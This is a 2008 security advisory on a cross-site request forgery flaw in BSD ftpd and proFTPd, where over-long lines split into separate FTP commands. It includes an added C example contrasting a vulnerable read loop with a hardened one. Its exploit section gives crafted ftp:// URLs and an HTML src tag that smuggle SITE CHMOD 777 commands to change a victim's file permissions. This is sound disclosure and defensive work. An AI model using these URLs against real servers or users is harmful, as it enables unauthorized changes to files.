multiple vendor ftpd - Cross-site request forgery

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ multiple vendor ftpd - Cross-site request forgery ]

Author: Maksymilian Arciemowicz
securityreason.com
Date:
- Written: 03.09.2008
- Public: 26.09.2008

SecurityReason Research
SecurityAlert Id: 56

CVE: not assigned
SecurityRisk: Low

Affected Software:
This problem has been discovered on OpenBSD 4.3.
- Affected systems:
	+ OpenBSD
	+ NetBSD
	+ FreeBSD
	+ some Linux
- Affected applications:
	+ proFTPd
	+ others

Advisory URL:
http://securityreason.com/achievement_securityalert/56


--- 0. Description ---
ftpd -- Internet File Transfer Protocol server

The ftpd utility is the Internet File Transfer Protocol server process. The server uses the TCP protocol and listens at the port specified with the -P option or in the ``ftp'' service specification; see services(5).

Cross-site request forgery, also known as one-click attack, sidejacking or session riding and abbreviated as CSRF (Sea-Surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user the website trusts. Contrary to cross-site scripting (XSS), which exploits the trust a user has for a particular site, cross-site request forgery exploits the trust that a site has for a particular user.

http://en.wikipedia.org/wiki/Cross-site_request_forgery

--- 1. ftpd bsd - Cross-site request forgery ---
The core problem is that an over-long command line is split into several separate commands. It stems from the way the command loop reads input: a for(;;) loop calling fgets() into a fixed-size buffer, so a line longer than the buffer comes back in pieces and each piece is handled as a command of its own.

Example:
Command
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

will be split into

500 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA': command not understood.
500 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'


When a browser sends a request to the FTP daemon and the path is longer than 512 bytes, the URL will be split into several commands in the same way.

/* FreeBSD 7.0 */
ftp://cxib@127.0.0.1///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST

Response to the SYST command:
215 UNIX Type: L8 Version: BSD-199506


/* NetBSD 4.0 */
ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SYST

Response to the SYST command:
215 UNIX Type: L8 Version: NetBSD-ftpd 20080609
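To make the read-loop behaviour concrete from the defender's side, the following is an added example; it is not code from the advisory or from any BSD ftpd. It reproduces the loop in miniature: a fgets()-style reader (the hypothetical mem_gets helper, over an in-memory buffer instead of a socket) with a 32-byte line buffer standing in for ftpd's 512 bytes, fed a constructed session in which a 62-byte CWD path is immediately followed by SYST. The naive loop dispatches each fragment as a command, which is exactly how the trailing SYST in the URLs above reaches the command parser; the hardened reader notices that a read returned no newline, drains the rest of that line and rejects it as a whole. The cmdlist type, sample_session and the 500-reply wording in the comments are this example's own assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Stand-in for ftpd's fixed command-line buffer. Kept tiny (ftpd uses 512)
 * so the constructed sample below overflows it. */
#define LINEBUF  32
#define MAX_CMDS 16

typedef struct {
    int  ncmds;
    char cmds[MAX_CMDS][LINEBUF];
    int  rejected;   /* over-long lines refused by the hardened reader */
} cmdlist;

/* Minimal in-memory stream so the example runs without a socket. */
typedef struct { const char *p, *end; } memstream;

/* fgets() look-alike: reads at most size-1 bytes and stops after the first
 * newline, the same semantics that produce the split in ftpd's loop. */
static char *mem_gets(char *buf, int size, memstream *s)
{
    int i = 0;
    if (s->p >= s->end)
        return NULL;
    while (i < size - 1 && s->p < s->end) {
        char c = *s->p++;
        buf[i++] = c;
        if (c == '\n')
            break;
    }
    buf[i] = '\0';
    return buf;
}

static void strip_crlf(char *s)
{
    size_t n = strlen(s);
    while (n > 0 && (s[n - 1] == '\n' || s[n - 1] == '\r'))
        s[--n] = '\0';
}

static void push(cmdlist *l, const char *cmd)
{
    if (l->ncmds < MAX_CMDS) {
        strncpy(l->cmds[l->ncmds], cmd, LINEBUF - 1);
        l->cmds[l->ncmds][LINEBUF - 1] = '\0';
        l->ncmds++;
    }
}

/* Vulnerable pattern: every read result is dispatched as a command, so a
 * line longer than the buffer turns into several commands. */
int split_naive(const char *input, cmdlist *out)
{
    char buf[LINEBUF];
    memstream s = { input, input + strlen(input) };
    memset(out, 0, sizeof *out);
    for (;;) {
        if (mem_gets(buf, sizeof buf, &s) == NULL)
            break;
        strip_crlf(buf);
        push(out, buf);
    }
    return out->ncmds;
}

/* Hardened reader: a result with no newline means the line did not fit.
 * Drain the remainder of that line and reject it whole instead of executing
 * the fragments (a real server would answer "500 Line too long" here). */
int split_safe(const char *input, cmdlist *out)
{
    char buf[LINEBUF];
    memstream s = { input, input + strlen(input) };
    memset(out, 0, sizeof *out);
    for (;;) {
        if (mem_gets(buf, sizeof buf, &s) == NULL)
            break;
        if (strchr(buf, '\n') == NULL) {
            while (s.p < s.end && *s.p++ != '\n')
                ;
            out->rejected++;
            continue;
        }
        strip_crlf(buf);
        push(out, buf);
    }
    return out->ncmds;
}

/* Constructed session, not captured traffic: "CWD " plus 58 slashes is
 * 62 bytes, exactly two 31-byte reads, so the trailing SYST lands in a
 * read of its own. */
const char *sample_session(void)
{
    static char session[128];
    char path[64];
    memset(path, '/', 58);
    path[58] = '\0';
    snprintf(session, sizeof session,
             "USER anonymous\r\nCWD %sSYST\r\nQUIT\r\n", path);
    return session;
}

int main(void)
{
    cmdlist a, b;
    split_naive(sample_session(), &a);
    split_safe(sample_session(), &b);
    printf("naive: %d commands (fourth is '%s'); hardened: %d commands, %d rejected\n",
           a.ncmds, a.cmds[3], b.ncmds, b.rejected);
    return 0;
}
```

The condition the hardened reader keys on, a full buffer with no newline, is also the cheapest detection signal an operator has: on an unpatched server the fragments show up as bursts of "500 ... command not understood" replies for junk tokens in the ftpd log, as in the example responses above, and a short run of those from one session is worth an alert.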

This becomes dangerous when the bug is used as a CSRF attack: a crafted URL can carry a SITE CHMOD command to change file permissions, or other combinations of FTP commands. All that is needed is such a URL and the luck that an administrator opens it.

How to exploit it?

0.
Create an HTML file with tags like

src="ftp://.....////SITE%20CHMOD%20777%20FILENAME"
...

1.
Give the prepared URL to the user.

Example:
ftp://ftp.netbsd.org///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE

will change the permissions of EXAMPLEFILE when its owner opens this URL.

I think there should be some byte that informs about the overflow (an empty command should null this byte). We have diagnosed this issue on BSD systems. Unfortunately, we do not know exactly how many machines may be affected.

--- 2. How to fix ---
OpenBSD was informed first. A fix is available in CVS:

http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/extern.h
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y

Thanks to the OpenBSD team.

NetBSD:
http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c

proFTPd:
http://bugs.proftpd.org/show_bug.cgi?id=3115

SecurityReason has informed only the BSD developers and the proFTPd team.

--- 3. Greets ---
sp3x infospec p_e_a pi3 schain

--- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (OpenBSD)

iEYEARECAAYFAkjdBroACgkQpiCeOKaYa9aiFgCfSMm4Pb+2ELGr6WVNWcJHWz+8
3NgAoN6Owug0ezaLFqJ65xyrrDImtX3J
=8Rij
-----END PGP SIGNATURE-----
